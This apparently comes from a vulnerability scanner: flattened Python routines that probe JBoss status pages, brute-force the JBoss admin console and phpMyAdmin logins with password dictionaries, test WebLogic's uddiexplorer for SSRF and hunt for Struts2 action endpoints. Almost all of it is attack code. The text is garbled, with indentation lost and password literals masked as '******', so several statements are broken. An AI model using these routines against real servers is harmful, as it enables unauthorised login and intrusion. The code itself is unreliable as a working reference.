def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) print('testing if jboss information disclose vul') http = httpparse() tag = 'Max processing time' try: tm = http.httpreq('GET', protocol, ip, port, '/status?full=true') if (re.search(tag, str(tm[2]), re.I)) and tm[0] == 200 and (re.search( 'JBoss', str(tm[1]), re.I)): msg = 'There is jboss information disclose vul on url: ' + url + '/status?full=true.' number = 'v91' return True, url, number, msg else: pass except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg msg = 'There is no jboss information disclose vul' number = 'v0' return False, url, number, msg
def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) print('testing if JBOSS-adminConsole') http = httpparse() try: tm = http.httpreq('GET', protocol, ip, port, '/admin-console/index.seam') if re.search('jboss', str(tm[1]), re.I) and tm[0] == 200: #header = {"Cookie":"JSESSIONID=A04D33474CB89BA12F4DECA06F2B1003"} for password in psw: data = 'login_form=login_form&login_form%3Aname=admin&login_form%3Apassword='******'&login_form%3Asubmit=Login&javax.faces.ViewState=j_id4' data = data.encode(encoding='utf-8') tm = http.httpreq('POST', protocol, ip, port, '/admin-console/login.seam', data=data) if not re.search(b'attempt failed', tm[2], re.I): msg = 'Found JBOSS-adminConsole! in url:' + url + '/admin-console/index.seam with password: '******'.' print(msg) number = 'v5' return True, url, number, msg else: msg = 'Cannot found JBOSS-adminConsole! in url:' + url + '/admin-console/index.seam' number = 'v0' return False, url, number, msg else: msg = 'The url:' + url + 'is not jboss' number = 'v0' return False, url, number, msg except Exception as e: print(e) msg = 'error' number = 'v0' return False, url, number, msg msg = 'There is no JBOSS-adminConsole weakpass vul on url' number = 'v0' return False, url, number, msg
def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) print('testing if weblogic ssrf vul') http = httpparse() tag = 'Received a response from url: http://10.30.1.61 which did not have a valid SOAP' try: tm = http.httpreq( 'GET', protocol, ip, port, '/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.30.1.61&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' ) if (re.search(tag, str(tm[2]), re.I)) and tm[0] == 200: msg = 'There is weblogic ssrf vul on url: ' + url + ' .' number = 'v60' return True, url, number, msg else: pass except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg msg = 'There is no weblogic ssrf vul' number = 'v0' return False, url, number, msg
def http_url(self, method, url, postdata='', header={}): http = httpparse() if re.search('^http', url, re.I): url_all = url url_ele = url.split('/') if len(url_ele) > 3 and url_ele[-1] != '': url_tail = re.search( '/' + url_ele[3] + '$|/' + url_ele[3] + '/.*', url, re.I).group() #print url_tail else: url_tail = '/' if re.search(':', url_ele[2]): if method == 'GET': tm = http.httpreq('GET', url_ele[0].replace(':', ''), url_ele[2].split(':')[0], int(url_ele[2].split(':')[1]), url_tail, header=header) else: tm = http.httpreq('POST', url_ele[0].replace(':', ''), url_ele[2].split(':')[0], int(url_ele[2].split(':')[1]), url_tail, data=postdata) else: if re.search('^https', url, re.I): port = 443 else: port = 80 if method == 'GET': tm = http.httpreq('GET', url_ele[0].replace(':', ''), url_ele[2], port, url_tail, header=header) else: tm = http.httpreq('POST', url_ele[0].replace(':', ''), url_ele[2], port, url_tail, data=postdata) else: url_all = self.protocol + '://' + self.ip + ':' + str( self.port) + '/' + url #url_all = self.protocol + '://' + self.ip + ':' + str(self.port) + url if method == 'GET': tm = http.httpreq('GET', self.protocol, self.ip, self.port, '/' + url, header=header) else: tm = http.httpreq('POST', self.protocol, self.ip, self.port, '/' + url, data=postdata) return (url_all, tm)
def run(self): action_url = [] result = {} http2 = httpparse() #===Confirm root(location = ''/location = "") try: tm = http2.httpreq('GET', self.protocol, self.ip, self.port, '/') if tm[0] == 301 or tm[0] == 302: tm = http2.httpreq('GET', self.protocol, self.ip, self.port, '/', header='location')[1] self.newself(tm) else: new_tm = re.sub(b'//.*location', b'//aa', tm[2]) if re.search('location.*=\s*\'.*\'|location.*=\s*\".*\"', str(new_tm), re.I): locat_url_g = re.search( 'location.*=\s*\'(.*)\'|location.*=\s*\"(.*)\"', str(new_tm), re.I) if locat_url_g.group(1) is None: locat_url = locat_url_g.group(2) else: locat_url = locat_url_g.group(1) if re.search('http', locat_url, re.I): self.newself(locat_url) else: self.root_urls.append(locat_url) #print self.protocol, self.ip, self.port, self.root_urls #===fetch self.root_urls for js and action/do for root_url in self.root_urls: if re.search('\.action|\.do', root_url, re.I): action_url.append( re.search('.*\.action|.*\.do', root_url, re.I).group()) tm = self.http_url('GET', root_url)[1] action_url = action_url + self.findaction(str( tm[2])) + self.actioninjs(str(tm[2])) print(self.ip, self.port, self.protocol, self.root_urls) #===guess index.action/login.action if len(self.root_urls) == 1: for m in [ 'index.action', 'index.do', 'login.action', 'login.do', 'test.action', 'test.do', 'default.action', 'default.do' ]: if not re.search(m, str(action_url), re.I): rp_code = http2.httpreq('GET', self.protocol, self.ip, self.port, '/' + m)[0] if rp_code not in [401, 403, 404, 501, 502, 503, 504 ] and rp_code > 1: action_url.append(m) else: root_urls_ele = self.root_urls[1].split('/') if re.search('\.', root_urls_ele[-1]): root_path = self.root_urls[1].rstrip(root_urls_ele[-1]) else: root_path = self.root_urls[1] if not re.search('/$', root_path): root_path = root_path + '/' for m in [ 'index.action', 'index.do', 'login.action', 'login.do', 'test.action', 'test.do', 'default.action', 'default.do' ]: if not re.search(m, str(action_url), re.I): rp_code = http2.httpreq('GET', self.protocol, self.ip, self.port, '/' + m)[0] if rp_code not in [401, 403, 404, 501, 502, 503, 504 ] and rp_code > 1: action_url.append(m) rp_code = self.http_url('GET', root_path + m)[1][0] if rp_code not in [401, 403, 404, 501, 502, 503, 504 ] and rp_code > 1: action_url.append(root_path + m) print('>>>>>>>>>>>action_url:', action_url) #===Check St2 for url in action_url: if not re.search('=', url): rp_code = self.http_url('GET', url)[1][0] if rp_code not in [401, 403, 404, 501, 502, 503, 504 ] and rp_code > 1: result = self.struts2(url) if len(result) > 0: break except Exception as e: print(str(e)) return result
def verify(protocol,ip,port): url = protocol+'://'+ip+':'+str(port) flag_list = [b'src="navigation.php', b'frameborder="0" id="frame_content"', b'id="li_server_type">', b'class="disableAjax" title='] user_list = ['root', 'mysql', 'wwwroot', 'admin', 'zte'] error_i = 0 print('testing if phpmyadmin weak pass vul') http = httpparse() try: path = '/' tm = http.httpreq('GET', protocol, ip, port,path) if b'input_password' in tm[2] and b'name="token"' in tm[2]: url = 'http://' + ip + ":" + str(port) + "/index.php" else: path = path+"phpmyadmin/" newtm = http.httpreq('GET', protocol, ip, port,path) if b'input_password' in newtm[2] and b'name="token"' in newtm[2]: url = 'http://' + ip + ":" + str(port) + "/phpmyadmin/index.php" else: msg = 'It is not phpmyadmin server on url:' +url+'.' number = 'v0' return False,url,number,msg except Exception as e: pass passdictarr = getpassdict() psw = passdictarr.get_pass_dict() #psw = random.sample(psw, 4) for user in user_list: for pass_ in psw: try: opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor()) res_html = opener.open(url, timeout=10).read() res_html = res_html.decode() token = re.search('name="token" value="(.*?)" />', res_html) token_hash = urllib.parse.quote(token.group(1)) postdata = "pma_username=%s&pma_password=%s&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci&token=%s" % ( user, pass_, token_hash) postdata = postdata.encode(encoding="utf-8") res = opener.open(url,postdata, timeout=5) res_html = res.read() for flag in flag_list: if flag in res_html: msg = 'There is phpmyadmin weak pass vul on: %s , with username: %s and password: %s.' %(url,user,pass_) print(msg) number = 'v74' return True,url,number,msg else: pass except urllib.error.URLError as e: msg = str(e) error_i += 1 if error_i >= 3: msg = 'There is no phpmyadmin server on url:' +url+'.' number = 'v0' return False,url,number,msg except Exception as e: msg = str(e) msg = 'Therer is no phpmyadmin weakpass vul in url:' +url+'.' number = 'v0' return False,url,number,msg